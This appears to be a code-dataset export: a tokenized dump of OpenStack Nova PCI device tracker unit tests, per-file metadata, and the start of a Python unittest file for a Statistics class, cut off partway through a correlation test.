string|"'uuid'"
op|']'
op|']'
op|')'
op|','
number|'0'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'devs'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_pci_claim_instance_with_numa
name|'def'
name|'test_pci_claim_instance_with_numa'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_db_dev_3'
op|'='
name|'dict'
op|'('
name|'fake_db_dev_1'
op|','
name|'id'
op|'='
number|'4'
op|','
name|'address'
op|'='
string|"'0000:00:00.4'"
op|')'
newline|'\n'
name|'fake_devs_numa'
op|'='
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_db_devs'
op|')'
newline|'\n'
name|'fake_devs_numa'
op|'.'
name|'append'
op|'('
name|'fake_db_dev_3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'='
name|'manager'
op|'.'
name|'PciDevTracker'
op|'('
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_devs_numa'
op|')'
newline|'\n'
name|'pci_requests'
op|'='
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_requests'
op|')'
op|'['
op|':'
number|'1'
op|']'
newline|'\n'
name|'pci_requests'
op|'['
number|'0'
op|']'
op|'['
string|"'count'"
op|']'
op|'='
number|'2'
newline|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|'='
name|'objects'
op|'.'
name|'InstanceNUMATopology'
op|'('
nl|'\n'
name|'cells'
op|'='
op|'['
name|'objects'
op|'.'
name|'InstanceNUMACell'
op|'('
nl|'\n'
name|'id'
op|'='
number|'1'
op|','
name|'cpuset'
op|'='
name|'set'
op|'('
op|'['
number|'1'
op|','
number|'2'
op|']'
op|')'
op|','
name|'memory'
op|'='
number|'512'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
nl|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'len'
op|'('
name|'free_devs'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'v1'"
op|','
name|'free_devs'
op|'['
number|'0'
op|']'
op|'.'
name|'vendor_id'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'v1'"
op|','
name|'free_devs'
op|'['
number|'1'
op|']'
op|'.'
name|'vendor_id'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_pci_claim_instance_with_numa_fail
name|'def'
name|'test_pci_claim_instance_with_numa_fail'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|'='
name|'objects'
op|'.'
name|'InstanceNUMATopology'
op|'('
nl|'\n'
name|'cells'
op|'='
op|'['
name|'objects'
op|'.'
name|'InstanceNUMACell'
op|'('
nl|'\n'
name|'id'
op|'='
number|'1'
op|','
name|'cpuset'
op|'='
name|'set'
op|'('
op|'['
number|'1'
op|','
number|'2'
op|']'
op|')'
op|','
name|'memory'
op|'='
number|'512'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
nl|'\n'
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
nl|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'numa_topology'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_instance_deleted
name|'def'
name|'test_update_pci_for_instance_deleted'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'inst'
op|'.'
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'DELETED'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
op|'-'
number|'1'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_migration_in
name|'def'
name|'test_update_pci_for_migration_in'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'free_devs'
op|'['
number|'0'
op|']'
op|'.'
name|'vendor_id'
op|','
string|"'v'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_update_pci_for_migration_out
name|'def'
name|'test_update_pci_for_migration_out'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
name|'fake_pci_requests'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
op|'-'
number|'1'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
nl|'\n'
name|'dev'
name|'in'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'objects'
op|'.'
name|'PciDevice'
op|','
string|"'should_migrate_data'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'False'
op|')'
newline|'\n'
DECL|member|test_save
name|'def'
name|'test_save'
op|'('
name|'self'
op|','
name|'migrate_mock'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
nl|'\n'
string|"'nova.db.pci_device_update'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'_fake_pci_device_update'
op|')'
newline|'\n'
name|'fake_pci_v3'
op|'='
name|'dict'
op|'('
name|'fake_pci'
op|','
name|'address'
op|'='
string|"'0000:00:00.2'"
op|','
name|'vendor_id'
op|'='
string|"'v3'"
op|')'
newline|'\n'
name|'fake_pci_devs'
op|'='
op|'['
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci'
op|')'
op|','
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_2'
op|')'
op|','
nl|'\n'
name|'copy'
op|'.'
name|'deepcopy'
op|'('
name|'fake_pci_v3'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'_set_hvdevs'
op|'('
name|'fake_pci_devs'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'update_called'
op|'='
number|'0'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'save'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'update_called'
op|','
number|'3'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_save_removed
dedent|''
name|'def'
name|'test_save_removed'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
nl|'\n'
string|"'nova.db.pci_device_update'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'_fake_pci_device_update'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
nl|'\n'
string|"'nova.db.pci_device_destroy'"
op|','
nl|'\n'
name|'self'
op|'.'
name|'_fake_pci_device_destroy'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'destroy_called'
op|'='
number|'0'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
name|'dev'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'update_called'
op|'='
number|'0'
newline|'\n'
name|'dev'
op|'.'
name|'remove'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'save'
op|'('
name|'self'
op|'.'
name|'fake_context'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_devs'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'destroy_called'
op|','
number|'1'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_clean_usage
name|'def'
name|'test_clean_usage'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst_2'
op|'='
name|'copy'
op|'.'
name|'copy'
op|'('
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'inst_2'
op|'.'
name|'uuid'
op|'='
name|'uuidsentinel'
op|'.'
name|'instance2'
newline|'\n'
name|'migr'
op|'='
op|'{'
string|"'instance_uuid'"
op|':'
string|"'uuid2'"
op|','
string|"'vm_state'"
op|':'
name|'vm_states'
op|'.'
name|'BUILDING'
op|'}'
newline|'\n'
name|'orph'
op|'='
op|'{'
string|"'uuid'"
op|':'
string|"'uuid3'"
op|','
string|"'vm_state'"
op|':'
name|'vm_states'
op|'.'
name|'BUILDING'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v'"
op|'}'
op|']'
op|'}'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v1'"
op|'}'
op|']'
op|'}'
op|']'
op|','
nl|'\n'
name|'instance_uuid'
op|'='
name|'inst_2'
op|'.'
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'inst_2'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'free_devs'
op|'['
number|'0'
op|']'
op|'.'
name|'vendor_id'
op|','
string|"'v'"
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'clean_usage'
op|'('
op|'['
name|'self'
op|'.'
name|'inst'
op|']'
op|','
op|'['
name|'migr'
op|']'
op|','
op|'['
name|'orph'
op|']'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
nl|'\n'
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
name|'dev'
name|'in'
name|'free_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_clean_usage_claims
name|'def'
name|'test_clean_usage_claims'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst_2'
op|'='
name|'copy'
op|'.'
name|'copy'
op|'('
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'inst_2'
op|'.'
name|'uuid'
op|'='
name|'uuidsentinel'
op|'.'
name|'instance2'
newline|'\n'
name|'migr'
op|'='
op|'{'
string|"'instance_uuid'"
op|':'
string|"'uuid2'"
op|','
string|"'vm_state'"
op|':'
name|'vm_states'
op|'.'
name|'BUILDING'
op|'}'
newline|'\n'
name|'orph'
op|'='
op|'{'
string|"'uuid'"
op|':'
string|"'uuid3'"
op|','
string|"'vm_state'"
op|':'
name|'vm_states'
op|'.'
name|'BUILDING'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v'"
op|'}'
op|']'
op|'}'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v1'"
op|'}'
op|']'
op|'}'
op|']'
op|','
nl|'\n'
name|'instance_uuid'
op|'='
name|'inst_2'
op|'.'
name|'uuid'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'inst_2'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'clean_usage'
op|'('
op|'['
name|'self'
op|'.'
name|'inst'
op|']'
op|','
op|'['
name|'migr'
op|']'
op|','
op|'['
name|'orph'
op|']'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
nl|'\n'
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'vendor_id'
name|'for'
name|'dev'
name|'in'
name|'free_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'v'"
op|','
string|"'v1'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_clean_usage_no_request_match_no_claims
name|'def'
name|'test_clean_usage_no_request_match_no_claims'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
comment|'# Tests the case that there is no match for the request so the'
nl|'\n'
comment|'# claims mapping is set to None for the instance when the tracker'
nl|'\n'
comment|'# calls clean_usage.'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
op|'['
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_migration'
op|'('
name|'None'
op|','
name|'instance'
op|'='
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'3'
op|','
name|'len'
op|'('
name|'free_devs'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'clean_usage'
op|'('
op|'['
op|']'
op|','
op|'['
op|']'
op|','
op|'['
op|']'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'3'
op|','
name|'len'
op|'('
name|'free_devs'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
nl|'\n'
name|'set'
op|'('
op|'['
name|'dev'
op|'.'
name|'address'
name|'for'
name|'dev'
name|'in'
name|'free_devs'
op|']'
op|')'
op|','
nl|'\n'
name|'set'
op|'('
op|'['
string|"'0000:00:00.1'"
op|','
string|"'0000:00:00.2'"
op|','
string|"'0000:00:00.3'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.objects.InstancePCIRequests.get_by_instance'"
op|')'
newline|'\n'
DECL|member|test_free_devices
name|'def'
name|'test_free_devices'
op|'('
name|'self'
op|','
name|'mock_get'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_create_pci_requests_object'
op|'('
name|'mock_get'
op|','
nl|'\n'
op|'['
op|'{'
string|"'count'"
op|':'
number|'1'
op|','
string|"'spec'"
op|':'
op|'['
op|'{'
string|"'vendor_id'"
op|':'
string|"'v'"
op|'}'
op|']'
op|'}'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'claim_instance'
op|'('
name|'None'
op|','
name|'mock_get'
op|'.'
name|'return_value'
op|','
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'update_pci_for_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|','
name|'sign'
op|'='
number|'1'
op|')'
newline|'\n'
nl|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'2'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'free_instance'
op|'('
name|'None'
op|','
name|'self'
op|'.'
name|'inst'
op|')'
newline|'\n'
name|'free_devs'
op|'='
name|'self'
op|'.'
name|'tracker'
op|'.'
name|'pci_stats'
op|'.'
name|'get_free_devs'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'len'
op|'('
name|'free_devs'
op|')'
op|','
number|'3'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|PciGetInstanceDevs
dedent|''
dedent|''
name|'class'
name|'PciGetInstanceDevs'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|member|test_get_devs_object
indent|' '
name|'def'
name|'test_get_devs_object'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|_fake_obj_load_attr
indent|' '
name|'def'
name|'_fake_obj_load_attr'
op|'('
name|'foo'
op|','
name|'attrname'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'attrname'
op|'=='
string|"'pci_devices'"
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'load_attr_called'
op|'='
name|'True'
newline|'\n'
name|'foo'
op|'.'
name|'pci_devices'
op|'='
name|'objects'
op|'.'
name|'PciDeviceList'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'self'
op|'.'
name|'stub_out'
op|'('
nl|'\n'
string|"'nova.objects.Instance.obj_load_attr'"
op|','
nl|'\n'
name|'_fake_obj_load_attr'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'load_attr_called'
op|'='
name|'False'
newline|'\n'
name|'manager'
op|'.'
name|'get_instance_pci_devs'
op|'('
name|'objects'
op|'.'
name|'Instance'
op|'('
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'load_attr_called'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 11.865019
| 88
| 0.59599
| 6,737
| 43,687
| 3.734452
| 0.039632
| 0.203903
| 0.090226
| 0.121308
| 0.906395
| 0.884972
| 0.851385
| 0.815811
| 0.770102
| 0.732501
| 0
| 0.008641
| 0.094033
| 43,687
| 3,681
| 89
| 11.868242
| 0.627024
| 0
| 0
| 0.961967
| 0
| 0
| 0.35015
| 0.05544
| 0
| 0
| 0
| 0
| 0.013855
| 0
| null | null | 0
| 0.00326
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b6773d189828b7bc1f103144fecd56c47b4aec84
| 7,130
|
py
|
Python
|
Tests/test_Statistics.py
|
mykolatyniv/database_NJIT601
|
f4805c1ed35e5428c107de7311f97bd16fb3298f
|
[
"MIT"
] | null | null | null |
Tests/test_Statistics.py
|
mykolatyniv/database_NJIT601
|
f4805c1ed35e5428c107de7311f97bd16fb3298f
|
[
"MIT"
] | null | null | null |
Tests/test_Statistics.py
|
mykolatyniv/database_NJIT601
|
f4805c1ed35e5428c107de7311f97bd16fb3298f
|
[
"MIT"
] | 2
|
2019-11-03T15:16:13.000Z
|
2019-11-16T02:13:42.000Z
|
import unittest
from Statistics.Statistics import Statistics
from CsvReader.CsvReader import CsvReader
from pprint import pprint
class MyTestCase(unittest.TestCase):
def setUp(self) -> None:
self.statistics = Statistics()
def test_instantiate_calculator(self):
self.assertIsInstance(self.statistics, Statistics)
def test_population_mean(self):
test_data = CsvReader("Tests/Data/mean.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.mean(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_median(self):
test_data = CsvReader("Tests/Data/median.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.med(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'], row['Value 5'], row['Value 6']), result)
self.assertEqual(self.statistics.result, result)
def test_mode(self):
test_data = CsvReader("Tests/Data/mode.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.mod(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.statistics.result, result)
def test_population_standard_deviation(self):
test_data = CsvReader("Tests/Data/devi.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.population(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.statistics.result, result)
def test_variance_of_population_proportion(self):
test_data = CsvReader("Tests/Data/variance.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.variance(row['Value 1'], row['Value 2']), result)
self.assertEqual(self.statistics.result, result)
def test_z_score(self):
test_data = CsvReader("Tests/Data/score.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.score(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_standardized_score(self):
test_data = CsvReader("Tests/Data/score_1.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.standardized(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_correlation_coefficient(self):
test_data = CsvReader("Tests/Data/corr_coef.csv").data
pprint(test_data)
for row in test_data:
